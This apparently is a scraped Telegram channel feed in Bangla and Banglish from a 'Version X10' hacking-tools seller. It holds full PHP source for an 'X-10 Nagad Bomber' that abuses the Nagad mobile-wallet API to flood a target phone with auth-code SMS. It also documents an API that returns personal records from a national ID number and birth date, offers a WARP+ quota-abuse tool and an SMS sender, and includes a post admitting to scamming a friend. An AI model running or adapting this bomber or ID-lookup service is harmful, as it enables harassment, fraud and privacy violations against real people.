2 892
Підписники
Немає даних24 години
-147 днів
-6630 день
Архів дописів
2 892
apt update && apt upgrade -y
pkg install git -y
pkg install python
pip install requests
git clone https://github.com/VersionX10/X-10-WARP-PLUS.git
cd X-10-WARP-PLUS
python X-10_Warp.pyDiye Dilam 🤧
2 892
আজকে আপাতত কমেন্ট এ দেন কালকে টুলস দিয়ে দিব তখন আনলিমিটেড নিয়েন সবাই যার যত ইচ্ছা এখনো কমপ্লিট করিনাই টুলস টা 🫢
2 892
+2
যাদের 1.1.1.1 VPN এ জিবি লাগবে তারা যেভাবে স্ক্রিনশট এ দেখাইলাম অভাবে করে কপি করে দেন কমেন্ট এ
2 892
Custom Sms Api For Everyone..👍🙂
Api Url: https://api.versionx10.co/Sms/Backend/Master.php?key=Trial&phn=016****&msg=hello
Sender I'd: MIJAN TRADE
Request Limit: 1000
2 892
Welcome to the API for Version X10. Below you will find the details on how to make requests to our API
API Request Induction
URL:
https://api.versionx10.co/Server_copy/Master.php
Body:
{
"nid": "1234567890",
"dob": "1990-01-01",
"type": "pdf",
"version": "1"
}
Parameters
The API expects the following parameters:
1. nid: National Identification Number.
Type: String
Example: 1234567890
2. dob: Date of Birth.
Type: String
Format: YYYY-MM-DD
Example: 1990-01-01
3. type: Select API Response Format.
Type: String
Options: json, pdf
Example: json
4. version: Select PDF Version (if type is pdf).
Type: String
Options: 1, 2
Example: 1
The API supports both GET and POST methods for sending these parameters.
Example Requests
To make a request to the API, you can use the following URLs as examples:
1. JSON Response:
https://api.versionx10.co/Server_copy/Master.php?nid=1234567890&dob=1990-01-01&type=json
2. PDF Response Version 1:
https://api.versionx10.co/Server_copy/Master.php?nid=1234567890&dob=1990-01-01&type=pdf&version=1
3. PDF Response Version 2:
https://api.versionx10.co/Server_copy/Master.php?nid=1234567890&dob=1990-01-01&type=pdf&version=2
2 892
<?php function makeRequest($url, $method = 'GET', $headers = [], $payload = null) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); if ($method === 'POST') { curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($payload)); $headers[] = 'Content-Type: application/json'; } curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); $resp_x10 = curl_exec($ch); curl_close($ch); return json_decode($resp_x10, true); } function generateHeaders() { return [ 'User-Agent: okhttp/3.14.9', 'Connection: Keep-Alive', 'Accept-Encoding: gzip', 'X-KM-UserId: None', 'X-KM-User-AspId: 100012345612345', 'X-KM-User-Agent: ANDROID/1152', 'X-KM-DEVICE-FGP: ' . generateRandomString(32), 'X-KM-Accept-language: bn', 'X-KM-AppCode: 01' ]; } function generateRandomString($length) { $characters = '0123456789ABCDEF'; $randomString = ''; for ($i = 0; $i < $length; $i++) { $randomString .= $characters[rand(0, strlen($characters) - 1)]; } return $randomString; } function checkUserStatus($phn) { $url = "https://app.mynagad.com:20002/api/user/check-user-status-for-log-in"; $params = http_build_query(['msisdn' => $phn]); $headers = generateHeaders(); $resp_x10 = makeRequest("$url?$params", 'GET', $headers); if (isset($resp_x10['status']) && $resp_x10['status'] == "ACTIVE") { return $resp_x10['userId']; } else { outputError("NaGad account is not active."); return false; } } function sendRequest($uid) { $url = "https://app.mynagad.com:20002/api/wallet/generateAuthCode/deviceChange"; $payload = ["userId" => $uid]; $headers = generateHeaders(); $headers[] = 'Content-Type: application/json; charset=UTF-8'; $resp_x10 = makeRequest($url, 'POST', $headers, $payload); return $resp_x10; } function outputResults($phn) { $result = [ "Status" => "Sms Send Successfully", "Number" => $phn, "System" => "X-10 Nagad Bomber", "Dev" => "ARIF_MODZ" ]; echo json_encode($result, JSON_UNESCAPED_UNICODE | JSON_PRETTY_PRINT); } function outputError($message) { $error = ["error" => $message]; echo json_encode($error, JSON_UNESCAPED_UNICODE | JSON_PRETTY_PRINT); exit(); } if (isset($_GET['phn'])) { $phn = $_GET['phn']; $uid = checkUserStatus($phn); if ($uid) { $resp_x10 = sendRequest($uid); outputResults($phn); } } else { outputError("Missing parameters."); } ?>Nagad Bomber Main PHP Files.. Sorry PHP Seller 🤧💀
2 892
Ami Akta Kaje Busy Achi Aktu
Kaj Ta complete kore apnader msg er reply dibo Kew kichu mone koiren na
Ajke rater dike online a ashbo
2 892
+1
Friend Manusher Shathe Scamming Kemne Kore Vai 🙂
Jak Pera Nai Kore Khaaa Vikka Dichi 1500Tk
But Kosto Laglo Friend Chilo Amar 🤧
